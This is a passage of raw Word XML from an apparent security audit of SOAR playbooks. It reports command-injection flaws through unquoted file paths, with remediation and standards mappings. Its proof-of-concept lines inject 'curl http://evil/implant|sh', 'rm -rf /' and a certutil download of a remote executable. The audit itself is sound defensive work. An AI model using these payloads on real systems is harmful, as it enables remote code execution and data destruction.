        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deletion_string += f'"{filepath}" '</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the list of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:filepath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values for a host. They are interpolated into a bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for i in "…"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> list using only naive double-quote wrapping. A filepath containing a double-quote closes the string and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> injects a new command, which runs via SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>execute program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the endpoint. The deletion command built in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>generate_deletion_commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has the identical flaw and is arguably worse: it executes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rm -v $i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on fully attacker-influenced paths. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:filepath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, populated by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>log4j_respond.py:182-189</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.filePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (itself read from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>log4j_hosts_and_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> custom list at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>log4j_respond.py:66-92</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or any CEF filePath). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the deletion branch requires an analyst to answer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>confirm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the prompt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:165-192</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), but the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>locate_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:59-64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) runs with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> approval and is the first action on_start. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 2: internal_host_ssh_log4j_respond.locate_files (lines 59-64)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>command sent to SSH 'execute program' for host 'victim':</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RESULT=""; for i in "/tmp/a"; curl http://evil/implant|sh; echo "" "/tmp/b"; ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 3: generate_deletion_commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>deletion command: for i in "/tmp/x"; rm -rf /; echo "" ; do rm -v $i; done;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: never build a shell loop from untrusted paths. Pass each path as a single quoted token and test existence per path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import shlex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for k, v in host_search.items():</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checks = " ; ".join('if [ -f {p} ]; then echo true; else echo false; fi'.format(p=shlex.quote(fp)) for fp in v)</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parameters.append({"ip_hostname": k, "command": checks})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">and for deletion, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rm -- {quoted}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shlex.quote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stops option injection). This keeps the per-path true/false semantics the downstream parser expects while removing the quote-breakout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-78 OS Command Injection (2024 CWE Top 25 #7). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059.004 Command and Scripting Interpreter: Unix Shell, T1070 Indicator Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-04 — Command injection and arbitrary file deletion via filePath in delete_detected_files (no approval gate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.0). Exploitability: Exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/delete_detected_files.py:23,39,75,104</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Format_More_Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), executed via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:75</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>template = """del "{0}\""""   # :23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>template = """more "{0}\""""  # :39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parameters = ["artifact:*.cef.filePath"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The artifact </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is substituted into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>del "{0}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>more "{0}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and run through the Windows Remote Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> action (a cmd.exe shell). A filePath containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> breaks out of the quoted argument and runs attacker commands. There is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no prompt or approval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> anywhere in this playbook — it reads then deletes automatically. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.filePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.destinationAddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are attacker-chosen (e.g. a webshell path from a detection). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (precondition: WinRM configured, per </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 5: delete_detected_files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>del command (winrm run command): del "x.txt" &amp; certutil -urlcache -f http://evil/m.exe m.exe &amp; echo ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>more command (winrm run command): more "x.txt" &amp; certutil -urlcache -f http://evil/m.exe m.exe &amp; echo ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: use the EDR/WinRM app's native *delete file* action with a path parameter instead of a shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or validate the path against a strict allow-list and pass it to PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Remove-Item -LiteralPath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (single-quoted, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> doubled). Add an analyst </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> approval gate before deletion. Also constrain deletion to the directories the playbook is authorised to touch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-78 OS Command Injection (2024 CWE Top 25 #7); CWE-73. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter, T1070 Indicator Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / File Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-06 — Hard-coded AWS IAM console password applied to every re-enabled user (public repository)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 7.4). Exploitability: Exploitable as a known credential (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/AWS_IAM_Account_Unlocking.py:62; playbooks/AWS_IAM_Account_Unlocking.json:147</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>571  if filtered_input_0_user_item[0] is not None:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
